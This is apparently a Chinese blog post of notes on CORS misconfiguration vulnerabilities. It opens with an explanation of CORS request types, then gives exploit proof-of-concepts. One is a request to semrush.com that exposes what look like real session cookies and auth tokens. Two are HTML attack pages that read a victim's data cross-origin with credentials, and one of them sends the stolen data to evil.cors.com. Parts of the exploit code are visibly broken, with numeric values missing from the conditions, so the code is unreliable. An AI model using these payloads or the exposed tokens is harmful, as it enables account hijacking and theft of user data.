CORS

简介

用途

解决同源下资源共享问题(其他类似方案:更改document.domain属性 | 跨文档消息 | JSONP)

分类

(1)Simple Request

User Request:
function retrieveData() {

  var request = new XMLHttpRequest();

  request.open('GET', 'http://public-data.com/someData', true);

  request.onreadystatechange = handler;

  request.send();

}

Browser Request:
GET /someData/ HTTP/1.1

Host: public-data.com

 ......

Referer: http://xxx.com/somePage.html

Origin: http://xxx.com
Response:
HTTP/1.1 200 OK

Access-Control-Allow-Origin: http://xxx.com

Content-Type: application/xml

(2)Preflighted Request 

User Request:
function sendData() {

    var request = new XMLHttpRequest(),

    payload = ......;

    request.open('POST', 'http://public-data.com/someData', true);

    request.setRequestHeader('X-CUSTOM-HEADER', 'custom_header_value');

    request.onreadystatechange = handler;

    request.send(payload);

 }
 
Browser Request-1:
OPTIONS /someData/ HTTP/1.1

Host: public-data.com

 ......

Origin: http://xxx.com

Access-Control-Request-Method: POST

Access-Control-Request-Headers: X-CUSTOM-HEADER

Response-1:
HTTP/1.1 200 OK

Access-Control-Allow-Origin: http://xxx.com

Access-Control-Allow-Methods: POST, GET, OPTIONS

Access-Control-Allow-Headers: X-CUSTOM_HEADER

Access-Control-Max-Age: 1728000

......


Request-2:


POST /someData/ HTTP/1.1

Host: public-data.com

X-CUSTOM-HEADER: custom_header_value

......




Browser Response-2:


HTTP/1.1 200 OK

Access-Control-Allow-Origin: http://xxx.com

Content-Type: application/xml

......


(3)Requests with Credential

User Request:


function retrieveData() {

     var request = new XMLHttpRequest();

     request.open('GET', 'http://public-data.com/someData', true);

     request.withCredentials = true;

     request.onreadystatechange = handler;

     request.send();

 }


Response:


HTTP/1.1 200 OK

Access-Control-Allow-Origin: http://xxx.com

Content-Type: application/xml






POC 




GET /organic-traffic-insights/api/rest/1.2/users/███/projects?_= HTTP/1.1

Host: www.semrush.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/ Firefox/53.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Referer: https://www.semrush.com/projects/

X-Requested-With: XMLHttpRequest

Cookie: wp13557="UWYYADs-TTTW:WWLHWYDtlnDl-TJIH-UYUTDDDIALHUZDLZTAHTIV-CCAY-XMLT-IUUA-UYUBWXWZACCWDlLtkNlo_Jht"; ref_code=__default__; usertype=Free-User; marketing=%7B%22user_cmp%22%3A%22%22%2C%22user_label%22%3A%22%22%7D; localization=%7B%22locale%22%3A%22en%22%2C%22db%22%3A%22sg%22%7D; db_date=current; userdata=%7B%22tz%22%3A%22GMT+8%22%2C%22ol%22%3A%22en%22%7D; _ga=GA1.2.412244322.1496213122; _gid=GA1.2.1937633003.1496213122; visit_first=1496213122000; __uvt=; uvts=65OAcWY4QhJHESTs; referer_purchase=https%3A%2F%2Fes.semrush.com%2Fdashboard%2F; sct:feedback:show=false; __insp_uid=2126149429; temp_db_but=sg; db=us; exp_feature_popup_closed=yes; about_sessionid=gue5yj2t8bmucnlwuv1y1cxilq7a7q8g; about_csrf=i6C8isOR7WLuVa1348FSsPH6rXzVEQSr; n_userid=LuWhoFku7Ou4q2PeBHIUAg==; __zlcmid=gngUE7HFajaRsy; _bizo_bzid=ec0d2554-575b-420b-b404-51b70939ec49; _bizo_cksm=34222E182676EC07; _bizo_np_stats=155%3D338%2C; auth_token=CMFMT27JhWR9cnbkoV1dHvFaxc4tQ3f0B4IAw5BfTOjyeKeF9FKx8w2kpiLl; __insp_wid=1632961932; __insp_slim=1496248714271; __insp_nv=false; __insp_targlpu=aHR0cHM6Ly93d3cuc2VtcnVzaC5jb20vcHJvamVjdHMvIzgwMDEyMi92aWV3Lw%3D%3D; __insp_targlpt=U0VNcnVzaA%3D%3D; __insp_norec_howoften=true; __insp_norec_sess=true; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en; connect.sid=s%253A4cV9yXJcfQFXmC65JJn3KSP6Wp184s10.vGOEA1%252BgVTXbwDY4YSOkOjjnteLNyifmcQdJh8XZckI; _gat=1; _uetsid=_uetd1ba382c; JSESSIONID=4423D9EF5D5BEE794094AC0713E9EE8E; _gat_UA-6197637-22=1

Connection: close

Origin: https://itqayzlbkshw.com

response it returns Access-Control-Allow-Origin: https://itqayzlbkshw.com




CORS + CSRF -》向被攻击主机发送文件


CORS + XSS -》劫持用户会话 | 注入攻击


蠕虫


JSONP 


(1)


XSS


1.POC | EXP




(2)越权


同源策略绕过方法


(1)绕过 - 仅对域名校验






#POC

#"Access-Control-Allow-Origin: https://xx.co & Access-Control-Allow-

    Credentials: true".

#Origin: https://xx.co.evil.net, Access-Control-Allow-Origin: https://xx.co.evil.net.

<html>

<body>

<button type='button' onclick='cors()'>CORS</button>

<p id='demo'></p>

<script>

function cors() {

var xhttp = new XMLHttpRequest();

xhttp.onreadystatechange = function() {

if (this.readyState ==  && this.status == ) {

var a = this.responseText;

document.getElementById("demo").innerHTML = a;

xhttp.open("POST", "http://evil.cors.com", true);

xhttp.withCredentials = true;

console.log(a);

xhttp.send("data="+a);

}

};

xhttp.open("GET", "https://www.xx.co/api/v1/users/*******", true);

xhttp.withCredentials = true;

xhttp.send();

}

</script>

</body>

</html>






(2)访问源未列入白名单,并且具备规则Access-Control-Allow-Credentials: true






<html>

     <body>

         <h2>CORS PoC</h2>

         <div id="demo">

             <button type="button" onclick="cors()">Exploit</button>

         </div>

         <script>

             function cors() {

             var xhr = new XMLHttpRequest();

             xhr.onreadystatechange = function() {

                 if (this.readyState ==  && this.status == ) {

                 document.getElementById("demo").innerHTML = alert(this.responseText);

                 }

             };

              xhr.open("GET",

                       "https://api.xx.com/endpoint", true);

             xhr.withCredentials = true;

             xhr.send();

             }

         </script>

     </body>

 </html>




												


											
跨域资源共享(CORS)-漏洞整理的更多相关文章
	

    
								
  1. 跨域资源共享(CORS)问题解决方案
		
    CORS:Cross-Origin Resource Sharing(跨域资源共享) CORS被浏览器支持的版本情况如下:Chrome 3+.IE 8+.Firefox 3.5+.Opera 12+. ...
    
		
    2. 
						
  2. 跨域资源共享CORS与JSONP
		
    同源策略限制: 同源策略(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,如果没有同源策略,攻击者可以通过JavaScript获取你的邮件以及其他敏感信息,比如说 ...
    
		
    3. 
						
  3. 跨域解决方案 - 跨域资源共享cors
		
    目录 1. cors 介绍 2. 原理 3. cors 解决跨域 4. 自定义HTTP 头部字段解决跨域 5. 代码演示 5. 参考链接 1. cors 介绍 cors 说的是一个机制,其实相当于一个 ...
    
		
    4. 
						
  4. VUE  SpringCloud 跨域资源共享 CORS 详解
		
    VUE  SpringCloud 跨域资源共享 CORS 详解 作者:  张艳涛 日期: 2020年7月28日 本篇文章主要参考:阮一峰的网络日志 » 首页 » 档案 --跨域资源共享 CORS 详解 ...
    
		
    5. 
						
  5. 网络编程-跨域资源共享 CORS
		
    目录 1.什么是同源策略? 2.跨域资源共享 CORS 3.预检请求 4.CORS相关字段 5.Golang实现跨域 6.参考资料 1.什么是同源策略? 如果两个 URL 的 protocol.por ...
    
		
    6. 
						
  6. 跨域资源共享 CORS
		
    CORS是一个W3C标准,全称是"跨域资源共享"(Cross-origin resource sharing). 它允许浏览器向跨源服务器,发出XMLHttpRequest请求,从 ...
    
		
    7. 
						
  7. 跨域资源共享 CORS 详解
		
    CORS是一个W3C标准,全称是"跨域资源共享"(Cross-origin resource sharing). 它允许浏览器向跨源服务器,发出XMLHttpRequest请求,从 ...
    
		
    8. 
						
  8. 使Web Api 支持跨域资源共享(CORS)
		
    Reference:http://www.asp.net/web-api/overview/security/enabling-cross-origin-requests-in-web-api Imp ...
    
		
    9. 
						
  9. 跨域资源共享CORS详解
		
    简介 CORS是一个W3C标准,全称是"跨域资源共享"(Cross-origin resource sharing). 它允许浏览器向跨源服务器,发出XMLHttpRequest请 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 问题 G: 圆桌上的晚餐
			
    问题 G: 圆桌上的晚餐 时间限制: 1 Sec  内存限制: 128 MB提交: 1583  解决: 656[提交] [状态] [命题人:jsu_admin] 题目描述         大家一定在圆 ...
    
			
    2. 
						
  2. Linux基础命令一(补充)
			
    echo ls ls–l  ---- ll cd /  根目录 cd ~ cd -   返回上一个目录 env ip addr 显示物理网络地址,缩写:ip a /etc/init.d/network ...
    
			
    3. 
						
  3. IE9的兼容性
			
    /* 解决IE9表格错位 */ .el-table--border th:last-of-type.gutter { display: table-cell !important; width: 50 ...
    
			
    4. 
						
  4. bzoj4399 魔法少女LJJ   线段树合并+线段树二分+并查集
			
    题目传送门 https://lydsy.com/JudgeOnline/problem.php?id=4399 题解 毒瘤题 \(9\) 种操作还有支持动态图的连通性 仔细读题 $ c<=7$. ...
    
			
    5. 
						
  5. 详解zabbix中文版安装部署
			
    一.zabbix简介(摘自百度百科) zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案. zabbix能监视各种网络参数,保证服务器系统的安全运营:并提供柔软 ...
    
			
    6. 
						
  6. Python---基础---str
			
    #capitalize首字母大写,其余小写,返回字符串 ------------------------------ s = "i LOVE WangXiaoJing"print( ...
    
			
    7. 
						
  7. 51nod 1028 大数乘法 V2 【FFT模板题】
			
    题目链接 模板题.. #include<bits/stdc++.h> using namespace std; typedef int LL; typedef double db; nam ...
    
			
    8. 
						
  8. 028:with标签使用详解
			
    with标签使用详解: 1.在模板中享用使用变量,可以通过  with  语句实现: 2.with  有两种用法,具体情况如下 ( 包括注意事项 ) : index.html: <p>wi ...
    
			
    9. 
						
  9. simulate 中的一些操作
			
    1. neutralize: position based 的alpha int neutralize(int di, int ti) { ; ; ; ; ii < nsyms; ++ii) { ...
    
			
    10. 
						
  10. centos 配置vlan
			
    https://access.redhat.com/documentation/zh-cn/red_hat_enterprise_linux/7/html/networking_guide/sec-c ...
    
			
    11.